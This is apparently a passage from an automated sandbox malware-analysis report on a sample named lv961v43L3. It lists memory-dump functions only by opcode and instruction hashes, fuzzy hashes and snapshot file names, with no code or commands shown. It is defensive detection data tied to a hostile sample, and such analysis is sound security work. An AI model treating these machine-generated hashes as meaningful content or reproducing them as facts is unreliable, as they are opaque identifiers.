                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                  Function 00007FF848F58868 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f50000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb1a7d33a742f6e8f7a77633b1a5bd1ee4c699db2b77335f0bdb57303ad7e7ac
                                                                  • Instruction ID: 1d49bea8c35b00fd88cfe05ca8c65f3d484f3f610680d44b0cf80381d1f4bffc
                                                                  • Opcode Fuzzy Hash: eb1a7d33a742f6e8f7a77633b1a5bd1ee4c699db2b77335f0bdb57303ad7e7ac
                                                                  • Instruction Fuzzy Hash: 71E09A32D0C4068FFB00BB90C408AE8B214DF113A8F0942B68C0CAB2D3DF5DA9448BC9
                                                                  Function 00007FF848F7DA19 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 597909a8fcc91274b0b79cb26d94238969d4025c27bb257a08b1b35d7fd12649
                                                                  • Instruction ID: c159375d429ec0afea0d5e0e468aeac97c5da85282c5e99831b61553ae1b6295
                                                                  • Opcode Fuzzy Hash: 597909a8fcc91274b0b79cb26d94238969d4025c27bb257a08b1b35d7fd12649
                                                                  • Instruction Fuzzy Hash: 1FE01A2194E7C08FC70B973588698507F60EE6721078A40EEC185CF5A3D6199C49C701
                                                                  Function 00007FF848F7DA99 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2c914a325ffb6489f90c6cddd977befdef12a541f014bfc55de41418c0c46bea
                                                                  • Instruction ID: 4ec3e19fa029af7be7ca1469f26eea2a6ee19422f3c4ed22b681c00d17dfc76d
                                                                  • Opcode Fuzzy Hash: 2c914a325ffb6489f90c6cddd977befdef12a541f014bfc55de41418c0c46bea
                                                                  • Instruction Fuzzy Hash: 98E04F6284E3C04FC70B9B3088698403F70DE2721034A40EEC045CF2B3E51DC849C701
                                                                  Function 00007FF848F723C0 Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                  Function 00007FF848F7B890 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0382474be2252812ffddbfc94a16e0f37ee67439e0a9c7c8d7487183ef8c9765
                                                                  • Instruction ID: bf7645468760cd46ff41aa7bcaf8819c598a7fbb4119eb8a0ecdbad9e8a34274
                                                                  • Opcode Fuzzy Hash: 0382474be2252812ffddbfc94a16e0f37ee67439e0a9c7c8d7487183ef8c9765
                                                                  • Instruction Fuzzy Hash: FFD01234B64D044FD70CBB3888598747391EB6A216BD540BDD00BD72B6DA6ADC89C741
                                                                  Function 00007FF848F76F70 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cafd7b5e3ac81762a707ba99b176ee0fab41c2c9d3fb29d38313d5a8f2fc29b3
                                                                  • Instruction ID: c5a34ebc73b1fa3f08a84f7e1288ab048be772f40c5901f14b838ffcb05bb3cc
                                                                  • Opcode Fuzzy Hash: cafd7b5e3ac81762a707ba99b176ee0fab41c2c9d3fb29d38313d5a8f2fc29b3
                                                                  • Instruction Fuzzy Hash: 50D01234B65D044FC70CB73CC85987473A1EB6A216B9540B9D00AC72B1DA6ADC89C741
                                                                  Function 00007FF848F54244 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f50000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 540af10e50a338cdf5303f46fd2486f08212185d9439a203c1108ea3edf2051f
                                                                  • Instruction ID: 7013f54c0691c297b7872267183ad1c7150c85fd35929e4fd200a3cd3ee73816
                                                                  • Opcode Fuzzy Hash: 540af10e50a338cdf5303f46fd2486f08212185d9439a203c1108ea3edf2051f
                                                                  • Instruction Fuzzy Hash: ACD01270D1E61E5EE741AB54C4522BEBEB0EF00344F501076D109D22D7DE3C25458B88
                                                                  Function 00007FF848F406A5 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f40000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction ID: a144b7714f096e9690a12ab09cd8fb29104e8fd3cf48140c528981268bff062e
                                                                  • Opcode Fuzzy Hash: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction Fuzzy Hash: FDC08C21D1E40B08F480B36E18020ACA1005BF4F90FE00033CC0D600C3AE0D20C5018E
                                                                  Function 00007FF848F412B0 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f40000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction ID: f065831ebd1a1b53ed8eb6600afb9187c7e36720eee3f04111f77149463b3a75
                                                                  • Opcode Fuzzy Hash: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction Fuzzy Hash: 5CC04C345558099FD948FB29C88591477A0FB19215BD60090E409CB1B1D659DCD5C745
                                                                  Function 00007FF848F40B18 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f40000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction ID: 9243553e8296ae210d3b752d3f9dacd0808995e6ab42c23aa80c393566eb2edc
                                                                  • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction Fuzzy Hash: D1C08C305108088FC900F72CC88480072A0FB0D210BC10090E00DCB2B1E31A9CC4C700
                                                                  Function 00007FF848F45E65 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f40000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1a8d82633fb5999540a2a08a81060d959c725c36b5515cf8b7ff16a09a16d66b
                                                                  • Instruction ID: d444906156c74102e5d01adf169f3adf88d6a0b3a86331c2249fb477064a75c4
                                                                  • Opcode Fuzzy Hash: 1a8d82633fb5999540a2a08a81060d959c725c36b5515cf8b7ff16a09a16d66b
                                                                  • Instruction Fuzzy Hash: B4C04C15E2B82A9AF266631850212BE4457DF94B48F941076E40ED73CACF4C5A41828F
                                                                  Function 00007FF848F406C8 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f40000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction ID: b6e0460c78f17e90d5b2b1886824dd5463970b492affbd796a8b10c6c21c2174
                                                                  • Opcode Fuzzy Hash: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction Fuzzy Hash: 69B01210C6E40F04F44433BA0C4206570405B94640FD00071DC0C601C3994D10D4028A

                                                                  Executed Functions

                                                                  Function 00007FF848F10D4C Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5[_H
                                                                  • API String ID: 0-3279724263
                                                                  • Opcode ID: 5bdbb79f42ffdbd1b91b57003ea067847cad4b970d0c0ccd6221c0e288c9ea96
                                                                  • Instruction ID: 22e04f1026c1477ba82e8c0afaa162c31e36c796d0d8e3e7f3c8f764d6ed50ff
                                                                  • Opcode Fuzzy Hash: 5bdbb79f42ffdbd1b91b57003ea067847cad4b970d0c0ccd6221c0e288c9ea96
                                                                  • Instruction Fuzzy Hash: B691EF71D1DAA98FE789EB2888697B97FE1FB95350F0401BAC009E73D6CF7918148750
                                                                  Function 00007FF848F10E43 Relevance: .2, Instructions: 171COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cb549b0e047af0d19bd370fef737824005af64782fff840471e7a7640fd2e633
                                                                  • Instruction ID: f7f3f3cd3e1fd2dd8db1b0c73dc5b2e3e31781e103ace0fb6e988017d8da18ae
                                                                  • Opcode Fuzzy Hash: cb549b0e047af0d19bd370fef737824005af64782fff840471e7a7640fd2e633
                                                                  • Instruction Fuzzy Hash: 0451EE71A28A9A8FE388EF2884697B97FE1FB95354F44017EC00DE73D5CBB918148750
                                                                  Function 00007FF848F108D0 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e38d5871684b6fac266e47e324c4a78d835d449c5b61ac1e2a942e3bf70154b5
                                                                  • Instruction ID: f053ad09161a4c1b03e0ca0cb5def08496fe8b2851dd823569b80efb5011bd77
                                                                  • Opcode Fuzzy Hash: e38d5871684b6fac266e47e324c4a78d835d449c5b61ac1e2a942e3bf70154b5
                                                                  • Instruction Fuzzy Hash: 20413A22A1E5666EE344B37C60992F97790EF843A9F0806BBD04DCB1D7DF1C6C8182D9
                                                                  Function 00007FF848F11171 Relevance: .1, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4b671725f04a4047864b737e8f8f6b1c2cab0007da21bcff2c69af93263c17b0
                                                                  • Instruction ID: e3275e40edd19a1cb894b37dad1d59a26eceac9eac0d556509be43731c7794ac
                                                                  • Opcode Fuzzy Hash: 4b671725f04a4047864b737e8f8f6b1c2cab0007da21bcff2c69af93263c17b0
                                                                  • Instruction Fuzzy Hash: 0131613190D69A8FDB46EB64C8599B9BBF0FF5A300F0805FAC04AD71E3DB289845C751
                                                                  Function 00007FF848F10998 Relevance: .1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 66096f3e976e77e65564e1dd4d46901230bf213e4652a304c605267ed3cb4b40
                                                                  • Instruction ID: c47ca314a8d7fd3bafdd9b1d1e3fe1bc1e54a6067dd313fa188739d735b2656a
                                                                  • Opcode Fuzzy Hash: 66096f3e976e77e65564e1dd4d46901230bf213e4652a304c605267ed3cb4b40
                                                                  • Instruction Fuzzy Hash: 54210330B1D9191FE788F72C545A67932C2EF98361F1401B9E80EC33D6DE18AC818289
                                                                  Function 00007FF848F10C25 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2e9c4af9db4666489b27420fc1d572f35880906f61aba9e3eecf903ce7b374c5
                                                                  • Instruction ID: de354a87999d0c79dedcfb0367f7385919db729a536b0b4726b68574d2bc1428
                                                                  • Opcode Fuzzy Hash: 2e9c4af9db4666489b27420fc1d572f35880906f61aba9e3eecf903ce7b374c5
                                                                  • Instruction Fuzzy Hash: FA210635E0D2AA8EE312B76898511EC7B70EFC13A5F1445B3D448CA1C3DA3C694A8B99
                                                                  Function 00007FF848F11996 Relevance: .1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b4b063dd01629020ccb98c3cd8eff94e908862dbfc7f9b5686d4b8e856691964
                                                                  • Instruction ID: 537d32221607a18d9de87193e45117df2c90a35f1f06cebf4b884ac91af48481
                                                                  • Opcode Fuzzy Hash: b4b063dd01629020ccb98c3cd8eff94e908862dbfc7f9b5686d4b8e856691964
                                                                  • Instruction Fuzzy Hash: BF110D31E1C81A8FEB94FB28C4556B87392AF95391F5451B5D44EC72D3EE28ACC18B48
                                                                  Function 00007FF848F10C38 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d0feb53aa8363cae6a40360044fcce370b89e98a3751b87e54cba4bd4b19f95
                                                                  • Instruction ID: 8260812811331345da805c6a888e8577925fada5a9e8f7c54edfa7f8b689d6c7
                                                                  • Opcode Fuzzy Hash: 1d0feb53aa8363cae6a40360044fcce370b89e98a3751b87e54cba4bd4b19f95
                                                                  • Instruction Fuzzy Hash: 1111E035E0C6998FE702FB3888501AC7BB0EFC2390F0444B3D444DB2D2DA3859498B94
                                                                  Function 00007FF848F10C40 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb464e69b7c5e29eb9c35cc27b4cc3caa91a006bb9d3c9d5e3dcfc1659f2d3b7
                                                                  • Instruction ID: 3b14b814c4a6cb7d829f8e31c3b44b1f6021f170010db4e1875726c28dc64609
                                                                  • Opcode Fuzzy Hash: eb464e69b7c5e29eb9c35cc27b4cc3caa91a006bb9d3c9d5e3dcfc1659f2d3b7
                                                                  • Instruction Fuzzy Hash: 5411AD35E0D6998FE702FB3888501AC7FB0EF82390F1545F7D844DB2D2DA3869498B95
                                                                  Function 00007FF848F1190D Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4f96f6a53c423f0c14d04f50209ab13414a523a0ffd1a05a2c2536421738cb8e
                                                                  • Instruction ID: adab1a748efb0bb46f78b3d952c07289b04808a4bad351cb076f7e085e3bb0cc
                                                                  • Opcode Fuzzy Hash: 4f96f6a53c423f0c14d04f50209ab13414a523a0ffd1a05a2c2536421738cb8e
                                                                  • Instruction Fuzzy Hash: 9F018031E0C91B8EE7A4FB1884143B96292AF94390F5512B5D42DD32D3EF386D858A48
                                                                  Function 00007FF848F15A29 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 337a4c7b94926876ca55b565f27e61748289a3448aecd2220843149dfaefd906
                                                                  • Instruction ID: 89385502a9aec01a27e890b0abaad8099c4052caaa77292d211adb479cffe45f
                                                                  • Opcode Fuzzy Hash: 337a4c7b94926876ca55b565f27e61748289a3448aecd2220843149dfaefd906
                                                                  • Instruction Fuzzy Hash: F3012135948A5A8FCB55EF04C894BA977E1FBA8314F1502AAD40DD76A1DB34EA40CF81
                                                                  Function 00007FF848F10C50 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b920e0380d5bcbf01c410040f3dd080eff5807f6381b73374d15a7497cd3949
                                                                  • Instruction ID: 49e6c4a3e53fc43d3aa6668b6bde4042b0ec98a5ef633ce9899acc93e08db051
                                                                  • Opcode Fuzzy Hash: 5b920e0380d5bcbf01c410040f3dd080eff5807f6381b73374d15a7497cd3949
                                                                  • Instruction Fuzzy Hash: 2B015A30D0D2999FE712FB6488501A97FB0EF82340F5441E6D844DB2D2DA385A448B85
                                                                  Function 00007FF848F119C3 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction ID: f58570d2c8265491ed08c68c5d9847cf613ded511fa70a10fbfc05070a54d995
                                                                  • Opcode Fuzzy Hash: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction Fuzzy Hash: 07F03130D4C81ACEEB54FB14C8546F87361EB90351F1401B9C05E932D6DF386DC58A44
                                                                  Function 00007FF848F161A2 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction ID: 1c3e6bb6c5c8fa25d08b45fa2f0a2ef54429cb4e53f141ae4401aa6cc4099b56
                                                                  • Opcode Fuzzy Hash: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction Fuzzy Hash: 26F03934E0C1168FF7A4A254D4613AA63A0EB84350F5410B9D90EA73C2DF3CAD818B19
                                                                  Function 00007FF848F106A5 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction ID: 893723293233341e90a5efe4e678e9741e0810e8aa99a5453ef8770a2bb1440d
                                                                  • Opcode Fuzzy Hash: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction Fuzzy Hash: 80C08C20D1E42B08F401B32E14020ACA1005BC8390FD40033D80C400C1AE0D28C5018E
                                                                  Function 00007FF848F112B0 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction ID: 1fb5ecc139e6952c30e8ba01377716c6280cb855312ff545e6371ce8a2a85661
                                                                  • Opcode Fuzzy Hash: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction Fuzzy Hash: 33C04C345558098FC948FB29C98591477A0FB19325BD60190E409CB1B1D759DCD5C745
                                                                  Function 00007FF848F10B18 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction ID: 51573c83aac1846bbca837130c15ea9e70de8e1f841a1e536e2981642cb3538d
                                                                  • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction Fuzzy Hash: A5C08C305108088FC900F72CC88480072A0FB0D310BC10090E00ECB2B0E31A9C80C700
                                                                  Function 00007FF848F15E65 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53af0e70ce68a46aee94c6ffa1247692b7555ab6164a547fbf4b5d4f9ef55720
                                                                  • Instruction ID: 20e2b511eb49150a0d16050cbdd9aedb26e4dd08bdb47cd103cb6167aeab38f2
                                                                  • Opcode Fuzzy Hash: 53af0e70ce68a46aee94c6ffa1247692b7555ab6164a547fbf4b5d4f9ef55720
